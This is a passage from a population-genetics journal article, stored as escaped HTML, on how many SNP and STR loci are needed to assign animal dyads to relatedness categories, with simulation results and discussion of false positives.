id=\u0022xref-ref-12-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-12\u0022\u003ECope \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E). We ran three scenarios in which sex, age (in age classes) and\/or mitochondrial DNA haplotype mtDNA (five equifrequent haplotypes at the start of the simulation) were known. This led to the exclusion of particular relationships for certain dyads even if they had the highest likelihood, in which case that dyad was then assigned to the relatedness category with the second highest likelihood, according to the following criteria:\u003C\/p\u003E\u003Col class=\u0022list-ord \u0022 id=\u0022list-1\u0022\u003E\u003Cli id=\u0022list-item-1\u0022\u003E\u003Cp id=\u0022p-25\u0022\u003EmtDNA haplotype known. Individuals not sharing their mtDNA haplotypes could not be assigned to the category FS. Female-female dyads not sharing their mtDNA haplotypes could not be assigned to the category PO.\u003C\/p\u003E\u003C\/li\u003E\u003Cli id=\u0022list-item-2\u0022\u003E\u003Cp id=\u0022p-26\u0022\u003EAge known. Individuals whose age difference was less than the age at sexual maturity could not be assigned to PO.\u003C\/p\u003E\u003C\/li\u003E\u003Cli id=\u0022list-item-3\u0022\u003E\u003Cp id=\u0022p-27\u0022\u003EAge and mtDNA haplotype known. The same dyads were excluded as in (1) and (2). Additionally, dyads in which the older individual was female and which did not share their mtDNA haplotype could not be assigned to PO.\u003C\/p\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Cp id=\u0022p-28\u0022\u003EAlthough dyads could be excluded from being grandparent\u2212grand offspring using age data, there were no age or mtDNA haplotype restrictions for R = 0.25 because this category included other relationships without age restrictions.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv id=\u0022sec-7\u0022 class=\u0022subsection\u0022\u003E\u003Ch3\u003EData availability\u003C\/h3\u003E\u003Cp id=\u0022p-29\u0022\u003EThe simulation code is available on DRYAD (\u003Ca href=\u0022http:\/\/dx.doi.org\/10.5061\/dryad.sr61r\u0022\u003Ehttp:\/dx.doi.org\/10.5061\/dryad.sr61r\u003C\/a\u003E).\u003C\/p\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv class=\u0022section results\u0022 id=\u0022sec-8\u0022\u003E\u003Ch2 class=\u0022\u0022\u003EResults\u003C\/h2\u003E\u003Cp id=\u0022p-30\u0022\u003EFor a clear arrangement of our results, they were summarized together with the questions and reasoning in \u003Ca id=\u0022xref-table-wrap-1-4\u0022 class=\u0022xref-table\u0022 href=\u0022#T1\u0022\u003ETable 1\u003C\/a\u003E. The correct classification rate of an RCA was affected by the number of loci, MAF, typing error rate, availability of additional data as well as intrinsic population characteristics (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS2.pdf\u0022\u003ETable S2\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS3.pdf\u0022\u003ETable S3\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS4.pdf\u0022\u003ETable S4\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS5.pdf\u0022\u003ETable S5\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS6.pdf\u0022\u003ETable S6\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS1.pdf\u0022\u003EFigure S1\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS2.pdf\u0022\u003EFigure S2\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS3.pdf\u0022\u003EFigure S3\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS7.pdf\u0022\u003EFigure S7\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS8.pdf\u0022\u003EFigure S8\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS9.pdf\u0022\u003EFigure S9\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS10.pdf\u0022\u003EFigure S10\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS11.pdf\u0022\u003EFigure S11\u003C\/a\u003E, \u003Ca id=\u0022xref-fig-1-8\u0022 class=\u0022xref-fig\u0022 href=\u0022#F1\u0022\u003EFigure 1\u003C\/a\u003E, \u003Ca id=\u0022xref-fig-2-3\u0022 class=\u0022xref-fig\u0022 href=\u0022#F2\u0022\u003EFigure 2\u003C\/a\u003E, and \u003Ca id=\u0022xref-table-wrap-2-9\u0022 class=\u0022xref-table\u0022 href=\u0022#T2\u0022\u003ETable 2\u003C\/a\u003E). Note that the formula for the likelihood for monozygotic twins was used in the simulations but we do not show the correct classification rate of assigning dyads to this category in the results section. However, we observed that a few dyads were assigned to this category when the MAF was low and 50 or 100 SNPs were used.\u003C\/p\u003E\u003Cdiv id=\u0022F1\u0022 class=\u0022fig pos-float type-figure odd\u0022\u003E\u003Cdiv class=\u0022highwire-figure\u0022\u003E\u003Cdiv class=\u0022fig-inline-img-wrapper\u0022\u003E\u003Cdiv class=\u0022fig-inline-img\u0022\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F1.large.jpg?width=800\u0026amp;height=600\u0026amp;carousel=1\u0022 title=\u0022Promiscuity: correct classification rate of relatedness category assignment (RCA) in a promiscuous population (average over 10 simulations). Three different minor allele frequencies (MAF) for single-nucleotide polymorphisms (SNPs), seven different numbers of SNP loci (individual bars from left to right: 50, 100, 200, 400, 800, 1600, 3200), four different numbers of STR loci (from left to right: 10, 20, 40, 80), and a combination of SNP with 20 STR loci were simulated. On the left vertical axes, the proportion of the correct pedigree relatedness color in each category (PO: parent-offspring; FS: full sibs; unrel: unrelated) indicates the correct classification rate of the category-assignment based on the genetic loci. Other colors indicate source of erroneously assigned categories. The right vertical axes, and the lines in the subplots, indicate the number (No) of dyads that were assigned to each category (the true number of dyads can be inferred where almost 100% correct classification rates were achieved). The orders of magnitude at the top of the No dyads\/category scale of the first row apply to all No dyads\/category scales below it. Figure S1 and Figure S2 show the same plots for other mating systems. The variability between the 10 independent simulations is presented in Table S2.\u0022 class=\u0022highwire-fragment fragment-images colorbox-load\u0022 rel=\u0022gallery-fragment-images-993455445\u0022 data-figure-caption=\u0022\u0026lt;div class=\u0026quot;highwire-markup\u0026quot;\u0026gt;Promiscuity: correct classification rate of relatedness category assignment (RCA) in a promiscuous population (average over 10 simulations). Three different minor allele frequencies (MAF) for single-nucleotide polymorphisms (SNPs), seven different numbers of SNP loci (individual bars from left to right: 50, 100, 200, 400, 800, 1600, 3200), four different numbers of STR loci (from left to right: 10, 20, 40, 80), and a combination of SNP with 20 STR loci were simulated. On the left vertical axes, the proportion of the correct pedigree relatedness color in each category (PO: parent-offspring; FS: full sibs; unrel: unrelated) indicates the correct classification rate of the category-assignment based on the genetic loci. Other colors indicate source of erroneously assigned categories. The right vertical axes, and the lines in the subplots, indicate the number (No) of dyads that were assigned to each category (the true number of dyads can be inferred where almost 100% correct classification rates were achieved). The orders of magnitude at the top of the No dyads\/category scale of the first row apply to all No dyads\/category scales below it. Figure S1 and Figure S2 show the same plots for other mating systems. The variability between the 10 independent simulations is presented in Table S2.\u0026lt;\/div\u0026gt;\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003E\u003Cspan class=\u0022hw-responsive-img\u0022\u003E\u003Cimg class=\u0022highwire-fragment fragment-image lazyload\u0022 alt=\u0022Figure 1\u0022 src=\u0022data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\u0022 data-src=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F1.medium.gif\u0022 width=\u0022291\u0022 height=\u0022440\u0022\/\u003E\u003Cnoscript\u003E\u003Cimg class=\u0022highwire-fragment fragment-image\u0022 alt=\u0022Figure 1\u0022 src=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F1.medium.gif\u0022 width=\u0022291\u0022 height=\u0022440\u0022\/\u003E\u003C\/noscript\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cul class=\u0022highwire-figure-links inline\u0022\u003E\u003Cli class=\u0022download-fig first\u0022\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F1.large.jpg?download=true\u0022 class=\u0022highwire-figure-link highwire-figure-link-download\u0022 title=\u0022Download Figure 1\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EDownload figure\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022new-tab\u0022\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F1.large.jpg\u0022 class=\u0022highwire-figure-link highwire-figure-link-newtab\u0022 target=\u0022_blank\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EOpen in new tab\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022download-ppt last\u0022\u003E\u003Ca href=\u0022\/highwire\/powerpoint\/466659\u0022 class=\u0022highwire-figure-link highwire-figure-link-ppt\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EDownload powerpoint\u003C\/a\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003C\/div\u003E\u003Cdiv class=\u0022fig-caption\u0022 xmlns:xhtml=\u0022http:\/\/www.w3.org\/1999\/xhtml\u0022\u003E\u003Cspan class=\u0022fig-label\u0022\u003EFigure 1\u003C\/span\u003E \u003Cp id=\u0022p-31\u0022 class=\u0022first-child\u0022\u003EPromiscuity: correct classification rate of relatedness category assignment (RCA) in a promiscuous population (average over 10 simulations). Three different minor allele frequencies (MAF) for single-nucleotide polymorphisms (SNPs), seven different numbers of SNP loci (individual bars from left to right: 50, 100, 200, 400, 800, 1600, 3200), four different numbers of STR loci (from left to right: 10, 20, 40, 80), and a combination of SNP with 20 STR loci were simulated. On the left vertical axes, the proportion of the correct pedigree relatedness color in each category (PO: parent-offspring; FS: full sibs; unrel: unrelated) indicates the correct classification rate of the category-assignment based on the genetic loci. Other colors indicate source of erroneously assigned categories. The right vertical axes, and the lines in the subplots, indicate the number (No) of dyads that were assigned to each category (the true number of dyads can be inferred where almost 100% correct classification rates were achieved). The orders of magnitude at the top of the No dyads\/category scale of the first row apply to all No dyads\/category scales below it. \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS1.pdf\u0022\u003EFigure S1\u003C\/a\u003E and \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS2.pdf\u0022\u003EFigure S2\u003C\/a\u003E show the same plots for other mating systems. The variability between the 10 independent simulations is presented in \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS2.pdf\u0022\u003ETable S2\u003C\/a\u003E.\u003C\/p\u003E\u003Cdiv class=\u0022sb-div caption-clear\u0022\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv id=\u0022F2\u0022 class=\u0022fig pos-float type-figure odd\u0022\u003E\u003Cdiv class=\u0022highwire-figure\u0022\u003E\u003Cdiv class=\u0022fig-inline-img-wrapper\u0022\u003E\u003Cdiv class=\u0022fig-inline-img\u0022\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F2.large.jpg?width=800\u0026amp;height=600\u0026amp;carousel=1\u0022 title=\u0022Effect of additional data on correct classification rate of relatedness category assignment in a monogamous population using 20 STRs. In addition to age and\/or mtDNA haplotype, the sex of the individuals was known. Plotted are mean and range of the correct classification rate based on 10 independent simulations.\u0022 class=\u0022highwire-fragment fragment-images colorbox-load\u0022 rel=\u0022gallery-fragment-images-993455445\u0022 data-figure-caption=\u0022\u0026lt;div class=\u0026quot;highwire-markup\u0026quot;\u0026gt;Effect of additional data on correct classification rate of relatedness category assignment in a monogamous population using 20 STRs. In addition to age and\/or mtDNA haplotype, the sex of the individuals was known. Plotted are mean and range of the correct classification rate based on 10 independent simulations.\u0026lt;\/div\u0026gt;\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003E\u003Cspan class=\u0022hw-responsive-img\u0022\u003E\u003Cimg class=\u0022highwire-fragment fragment-image lazyload\u0022 alt=\u0022Figure 2\u0022 src=\u0022data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\u0022 data-src=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F2.medium.gif\u0022 width=\u0022440\u0022 height=\u0022205\u0022\/\u003E\u003Cnoscript\u003E\u003Cimg class=\u0022highwire-fragment fragment-image\u0022 alt=\u0022Figure 2\u0022 src=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F2.medium.gif\u0022 width=\u0022440\u0022 height=\u0022205\u0022\/\u003E\u003C\/noscript\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cul class=\u0022highwire-figure-links inline\u0022\u003E\u003Cli class=\u0022download-fig first\u0022\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F2.large.jpg?download=true\u0022 class=\u0022highwire-figure-link highwire-figure-link-download\u0022 title=\u0022Download Figure 2\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EDownload figure\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022new-tab\u0022\u003E\u003Ca href=\u0022https:\/\/www.g3journal.org\/content\/ggg\/5\/9\/1815\/F2.large.jpg\u0022 class=\u0022highwire-figure-link highwire-figure-link-newtab\u0022 target=\u0022_blank\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EOpen in new tab\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022download-ppt last\u0022\u003E\u003Ca href=\u0022\/highwire\/powerpoint\/466654\u0022 class=\u0022highwire-figure-link highwire-figure-link-ppt\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EDownload powerpoint\u003C\/a\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003C\/div\u003E\u003Cdiv class=\u0022fig-caption\u0022\u003E\u003Cspan class=\u0022fig-label\u0022\u003EFigure 2\u003C\/span\u003E \u003Cp id=\u0022p-32\u0022 class=\u0022first-child\u0022\u003EEffect of additional data on correct classification rate of relatedness category assignment in a monogamous population using 20 STRs. In addition to age and\/or mtDNA haplotype, the sex of the individuals was known. Plotted are mean and range of the correct classification rate based on 10 independent simulations.\u003C\/p\u003E\u003Cdiv class=\u0022sb-div caption-clear\u0022\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv id=\u0022T2\u0022 class=\u0022table pos-float\u0022\u003E\u003Cdiv class=\u0022table-inline table-callout-links\u0022\u003E\u003Cdiv class=\u0022callout\u0022\u003E\u003Cspan\u003EView this table:\u003C\/span\u003E\u003Cul class=\u0022callout-links\u0022\u003E\u003Cli class=\u0022view-inline first\u0022\u003E\u003Ca href=\u0022##\u0022 class=\u0022table-expand-inline\u0022 data-table-url=\u0022\/highwire\/markup\/466661\/expansion?postprocessors=highwire_tables%2Chighwire_reclass%2Chighwire_figures%2Chighwire_math%2Chighwire_inline_linked_media%2Chighwire_embed\u0026amp;table-expand-inline=1\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EView inline\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022view-popup last\u0022\u003E\u003Ca href=\u0022\/highwire\/markup\/466661\/expansion?width=1000\u0026amp;height=500\u0026amp;iframe=true\u0026amp;postprocessors=highwire_tables%2Chighwire_reclass%2Chighwire_figures%2Chighwire_math%2Chighwire_inline_linked_media%2Chighwire_embed\u0022 class=\u0022colorbox colorbox-load table-expand-popup\u0022 rel=\u0022gallery-fragment-tables\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EView popup\u003C\/a\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv class=\u0022table-caption\u0022\u003E\u003Cspan class=\u0022table-label\u0022\u003ETable 2\u003C\/span\u003E \u003Cspan class=\u0022caption-title\u0022\u003EMinimum number of SNP and\/or STR loci required per category for a relatedness category assignment with \u0026gt;95% (\u0026gt;80%) correct classification rates\u003C\/span\u003E\u003Cdiv class=\u0022sb-div caption-clear\u0022\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cp id=\u0022p-37\u0022\u003EPopulation size averaged 598.67 individuals, with range of 482\u2212703 individuals; note that these numbers of individuals are equal to 115,921 to 246,753 dyads. Within this large number of dyads, there were a few dyads that were assigned to more than one relatedness category based on pedigree (monogamy: mean = 0.63 dyads, range = 0\u22126; polygyny: 4.27, 0\u221213; promiscuity: 4.53, 0\u221213). This was possible because we assigned the dyads to the same categories based on pedigree as for the RCA. The most common categories that were shared were R = 0.25 and R = 0.125, \u003Cem\u003Ee.g.\u003C\/em\u003E, dyads shared one parent and two grandparents that were not the shared parent\u2019s parent. Because of genetic drift, during the 100 simulated time steps of MAF 0.05 scenarios, a number of the 3200 SNP loci lost variation (became fixed for one allele): 25.8 (0.8%) in monogamy, 60.6 (1.9%) in polygyny, and 37.0 (1.2%) in promiscuity. No loci became fixed in scenarios with MAF = 0.25 or 0.5.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv class=\u0022section discussion\u0022 id=\u0022sec-9\u0022\u003E\u003Ch2 class=\u0022\u0022\u003EDiscussion\u003C\/h2\u003E\u003Cp id=\u0022p-38\u0022\u003ESeveral relatedness categories can be assigned with 80 or 95% correct classification rates if certain pitfalls are avoided by considering life history parameters, number of loci used, mean MAF, and typing error rate. As expected, there is always a positive correlation between correct classification rate of the RCA and the number of loci loci. Note that when using a realistic number of 800 SNPs or 20 STRs, more categories could be assigned at a given correct classification rate level by SNPs than by STRs (\u003Ca id=\u0022xref-table-wrap-2-10\u0022 class=\u0022xref-table\u0022 href=\u0022#T2\u0022\u003ETable 2\u003C\/a\u003E). This favors SNPs (or a combination of SNPs and STRs) over STRs. The assignment of more distantly related dyads than R = 0.25 (rarely R = 0.125) appears to be impossible using RCAs, even when 10,000s of SNP loci are available (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS3.pdf\u0022\u003EFigure S3\u003C\/a\u003E), possibly because of stochasticity in allele segregation or deeper roots of coancestry.\u003C\/p\u003E\u003Cp id=\u0022p-39\u0022\u003EEven though few (around 100 SNPs or 10 STRs) loci are sufficient to correctly assign most real (pedigree-based) parent-offspring and full sib pairs to the correct relatedness categories, the high rate of false positives (SNPs MAF 0.05 and 0.25: PO: 0.81\u22120.85 and 0.11\u22120.19, FS 0.75\u22120.99 and 0.23\u22120.98; STRs: PO 0.85\u22120.89, FS 0.92\u22120.99 across all three mating systems) at these relatedness categories makes the use of this small number of loci problematic, as previously reported for parentage inference (\u003Ca id=\u0022xref-ref-2-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-2\u0022\u003EAnderson and Garza 2006\u003C\/a\u003E). A combined data set of SNP and STR loci may increase the correct classification rate of RCAs, especially for parent-offspring pairs when SNP data with low informativeness are available (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS4.pdf\u0022\u003ETable S4\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS5.pdf\u0022\u003ETable S5\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS6.pdf\u0022\u003ETable S6\u003C\/a\u003E, and \u003Ca id=\u0022xref-table-wrap-2-11\u0022 class=\u0022xref-table\u0022 href=\u0022#T2\u0022\u003ETable 2\u003C\/a\u003E).\u003C\/p\u003E\u003Cp id=\u0022p-40\u0022\u003EFor our estimation we did not consider any prior knowledge of possible relationships. This approach seems realistic for many ecological studies in natural populations. Because of the absence of assumptions about the potential relationships, the numbers of loci suggested here (\u2265 40 STRs, 100\u22123200 SNPs) are much higher than the number of loci considered sufficient for the assignment of relatedness categories by \u003Ca id=\u0022xref-ref-8-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-8\u0022\u003EBrookfield and Parkin (1993\u003C\/a\u003E; 2\u22129+ STRs), \u003Ca id=\u0022xref-ref-47-4\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-47\u0022\u003EWang (2006\u003C\/a\u003E; 2\u221213 STRs, 11-92 SNPs 2006), or forensic studies (10\u221215 STRs, 51 SNPs, \u003Ca id=\u0022xref-ref-1-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-1\u0022\u003EAmorim and Pereira 2005\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-37-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-37\u0022\u003ESanchez \u003Cem\u003Eet al.\u003C\/em\u003E 2006\u003C\/a\u003E). This is because these studies\u2019 estimates were based on only two hypothetical relationships: null relatedness \u003Cem\u003Evs.\u003C\/em\u003E a single alternative relatedness category. Statistical significance for the support of the assignment of individual dyads to any relatedness category [by calculating LOD score (\u003Ca id=\u0022xref-ref-24-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-24\u0022\u003EKalinowski \u003Cem\u003Eet al.\u003C\/em\u003E 2007\u003C\/a\u003E) or FDR (\u003Ca id=\u0022xref-ref-39-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-39\u0022\u003ESkaug \u003Cem\u003Eet al.\u003C\/em\u003E 2010\u003C\/a\u003E)] was not inferred in our study, and, therefore, we might have underestimated the correct classification rate of the RCA. However, by assigning all dyads to the relatedness category with the greatest likelihood, all dyads were assigned to a relationship category.\u003C\/p\u003E\u003Cp id=\u0022p-41\u0022\u003ESome false-positive results may be identified through additional knowledge (\u003Ca id=\u0022xref-fig-2-4\u0022 class=\u0022xref-fig\u0022 href=\u0022#F2\u0022\u003EFigure 2\u003C\/a\u003E) such as mtDNA haplotype or age, which can be estimated from genetic samples (\u003Ca id=\u0022xref-ref-34-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-34\u0022\u003EPolanowski \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E). Besides increasing the correct classification rate of the category PO, age data also provide directionality to PO pairs, \u003Cem\u003Ei.e.\u003C\/em\u003E, identify who is the parent and who the offspring.\u003C\/p\u003E\u003Cp id=\u0022p-42\u0022\u003ESome false-positive results may be identified also by genetic data only: a polyadic approach, \u003Cem\u003Ei.e.\u003C\/em\u003E, comparing the compatibility of dyadic relationships by simultaneously assigning parentage and sibship, might filter out some incorrectly assigned dyads by identifying incompatible polyads. Borrowing the example from \u003Ca id=\u0022xref-ref-51-4\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-51\u0022\u003EWang and Santure (2009)\u003C\/a\u003E, if individuals A and B, and A and C, were assigned to the category full sibs the assignment of B and C to R = 0.25 is incompatible. A polyadic approach for sibship and parentage reconstruction was implemented in COLONY2 (\u003Ca id=\u0022xref-ref-51-5\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-51\u0022\u003EWang and Santure 2009\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-22-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-22\u0022\u003EJones and Wang 2010\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-49-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-49\u0022\u003EWang 2013\u003C\/a\u003E). Another approach which uses a third individual as reference when assigning a dyad to a relatedness category seems to perform better than a purely dyadic approach (\u003Ca id=\u0022xref-ref-48-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-48\u0022\u003EWang 2007\u003C\/a\u003E) and could change the number of required loci for an RCA presented here.\u003C\/p\u003E\u003Cp id=\u0022p-43\u0022\u003EThe exclusion from consideration of a single category (\u003Cem\u003Ee.g.\u003C\/em\u003E, R = 0.125, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS3.pdf\u0022\u003ETable S3\u003C\/a\u003E) in simulations decreased the correct classification rate of an adjacent category (\u003Cem\u003Ee.g.\u003C\/em\u003E, R = 0.25) and is therefore not recommended. However, the addition of an extra category (\u003Cem\u003Ei.e.\u003C\/em\u003E, R = 0.0625) may be beneficial (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/TableS4.pdf\u0022\u003ETable S4\u003C\/a\u003E and \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/FigureS7.pdf\u0022\u003EFigure S7\u003C\/a\u003E). To our knowledge, the category R = 0.0625 has not been used in previous studies (\u003Ca id=\u0022xref-ref-44-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-44\u0022\u003EThompson 1975\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-15-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-15\u0022\u003EEpstein \u003Cem\u003Eet al.\u003C\/em\u003E 2000\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-6-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-6\u0022\u003EBlouin 2003\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-47-5\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-47\u0022\u003EWang 2006\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-51-6\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-51\u0022\u003EWang and Santure 2009\u003C\/a\u003E) even though the expected proportion of shared genetic information is higher than for second cousins (R = 0.03125, described in \u003Ca id=\u0022xref-ref-47-6\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-47\u0022\u003EWang 2006\u003C\/a\u003E).\u003C\/p\u003E\u003Cp id=\u0022p-44\u0022\u003EThe categories R = 0.25 and R = 0.125 contain several relationships (half sibs\/grand-parent-grand-child\/avuncular and full cousins\/half-avuncular, quadruple second cousins, respectively). Methods to separate pedigree relationships sharing the same relationship coefficient have been proposed. They are based on the relationship between the number of chromosomal segments (approximately 2 Mb, as opposed to individual loci) shared IBD by two individuals and the number of meioses on the path relating these individuals (\u003Ca id=\u0022xref-ref-21-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-21\u0022\u003EHuff \u003Cem\u003Eet al.\u003C\/em\u003E 2011\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-10-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-10\u0022\u003EBrowning and Browning 2012\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-19-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-19\u0022\u003EHill and White 2013\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-28-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-28\u0022\u003ELi \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E). With these methods, dyads may be assigned with reasonable confidence also to relatedness categories more distant than R = 0.25 (\u003Ca id=\u0022xref-ref-18-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-18\u0022\u003EHenn \u003Cem\u003Eet al.\u003C\/em\u003E 2012\u003C\/a\u003E). These methods sound promising and feasible for non-model species if long scaffolds of their genomes are available for each individual. However, even with next-generation genotyping, most studies on nonmodel organisms do not have adequate mapping information to assign the IBD blocks upon which \u003Ca id=\u0022xref-ref-10-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-10\u0022\u003EBrowning and Browning (2012)\u003C\/a\u003E rely.\u003C\/p\u003E\u003Cp id=\u0022p-45\u0022\u003EThe simulation data sets are unrealistically ideal in terms of completeness of sampling (or extent of random sampling), missing data (none), and typing error (none for most simulations). Genotyping error rates of current next-generation sequencing platforms are still substantial and the power of the conversion of the raw sequencing reads into genotypes depends on sequencing depth and SNP calling algorithms (\u003Ca id=\u0022xref-ref-31-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-31\u0022\u003ENielsen \u003Cem\u003Eet al.\u003C\/em\u003E 2011\u003C\/a\u003E). But even if three SNP calling algorithms agree on an individual genotype, the assigned 